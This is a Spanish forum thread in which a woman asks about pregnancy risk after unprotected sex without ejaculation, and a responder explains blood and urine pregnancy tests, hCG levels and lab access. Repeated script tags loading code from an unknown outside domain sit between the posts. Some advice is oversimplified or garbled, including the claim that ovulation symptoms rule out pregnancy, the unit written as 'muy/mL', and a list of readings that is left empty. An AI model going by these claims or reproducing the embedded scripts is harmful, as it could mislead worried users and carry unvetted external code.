Me pasaría esto si estuviera embarazada

En el último día de regla tuve una relación, sin condón. Él estaba seco y no eyaculó, estuvimos poco tiempo y cuando paramos él seguía seco, no llegó a expulsar líquido preseminal, recuerdo que incluso a él le dolía por falta de lubricación. Ahora, en la fecha en la que tengo que ovular, efectivamente noto lo que noto siempre durante la ovulación, tengo flujo, etc. ¿Es seguro que esto es ovulación? Yo no noto nada raro, excepto un pequeño dolor, tal vez por los nervios, pero durante la ovulación a veces me viene ese dolor, o sea que nada raro. Si estuviese embarazada, no tendría estos síntomas de la ovulación, ¿verdad? Y si estuviese embarazada, no se produciría ovulación, supongo. Por lo que he contado, no es probable que esté embarazada, ¿no? La verdad me preocupa mucho esa idea y si en algún momento notase algo raro, seguramente sería por los nervios.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script>

1 respuesta

Respuesta

Tienes síntomas de ovulación, por lo que de principio no estás embarazada, así que tranquila, eso sí, la siguiente vez usad preservativo o algún método de anticoncepción, para evitar cualquier susto. Cuando una mujer está en periodo de gestación, la ovulación se bloquea automáticamente. De todas maneras, para mayor información, te daré las pruebas de embarazo, con el tiempo de espera después de la relación sexual con riesgo y sus resultados.

Sangre: Esa prueba es totalmente fiable a los 10 días de la relación sexual con riesgo. Si eres menor de edad, debes de ir acompañada por un adulto, preferiblemente tus padres o tutores legales; es aconsejable la fracción beta cuantitativa, ya que te dicen los valores exacto de hcg en sangre. Se puede conseguir en laboratorios de análisis clínicos, ambulatorios, planificación familiar. La lectura es la siguiente:

Prueba de embarazo positiva: Cuando los valores de hcg en sangre son mayores de 5 muy/mL. Ahí se considera que la mujer está embarazada.

Prueba de embarazo negativa: Cuando los valores de hcg en sangre son menores de 5 muy/mL. Se considera que la mujer no está embarazada.

Orina: Son menos fiables que la de sangre, y un negativo no quiere decir NO EMBARAZADA, ya que puede ser que en tu orina no tenga suficiente hormona hcg. Se debe de realizarte a partir de la primera semana de retraso menstrual, y que haya pasado más de 20 días de la última relación sexual con riesgo. Es aconsejable hacerse la prueba la primera micción de la mañana.

Si sale un resultado negativo, y la regla sigue sin llegar es conveniente repetir a la semana de la prueba, y si sigue sin venir otra prueba, y en ese caso acudir a un ginecólogo, para verificar posibles alteraciones en ovarios, trompas de falopio etc..
.
Estas pruebas se puede conseguir perfectamente en farmacia, y cuesta alrededor de unos 12-15 euros. Es recomendable pedir un test de sensibilidad de 25 muy/mL, ya que son más sensibles que de una de 50 muy/mL. La lectura de estos test es:

Recomiendo realizar la de sangre, ya que esta sale de forma directa, y es totalmente fiable.

muchas gracias por las explicaciones. Otra cosa, en el caso de embarazos psicológicos, ¿las pruebas darían positivo o negativo? Y en caso de la prueba de sangre, ¿es válida a cualquier hora del día, o tiene que ser en ayunas como un análisis de sangre?

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script>

1- En un embarazo psicológico, no se produce la gonadotropina humana (HCG), la hormona del embarazo, por lo que no falsea los resultados, solo puede dar falsos positivos, si ingieres medicación que contenga HCG.

2- Los análisis de sangre se puede hacer en cualquier momento del día, aunque es aconsejable hacerlos por la mañana en un Laboratorio de Análisis Clínico, y así tendrás el resultado el mismo día. No hace falta estar en ayunas.

¿y los análisis de sangre los hacen directamente en el Laboratorio o es necesario llevar una receta o prescripción médica? ¿no es necesario ir antes al médico?

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script>

No, no hace falta receta médica en un Laboratorio de Análisis Clínico, pero eso sí, es de pago, pero te lo da en el mismo día. Si no quieres pagar, entonces sí que tendrías que pedir al MAP (Médico de Atención Primaria), para hacerte el análisis, pero puede tardar hasta una semana, pero en el Laboratorio no.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script>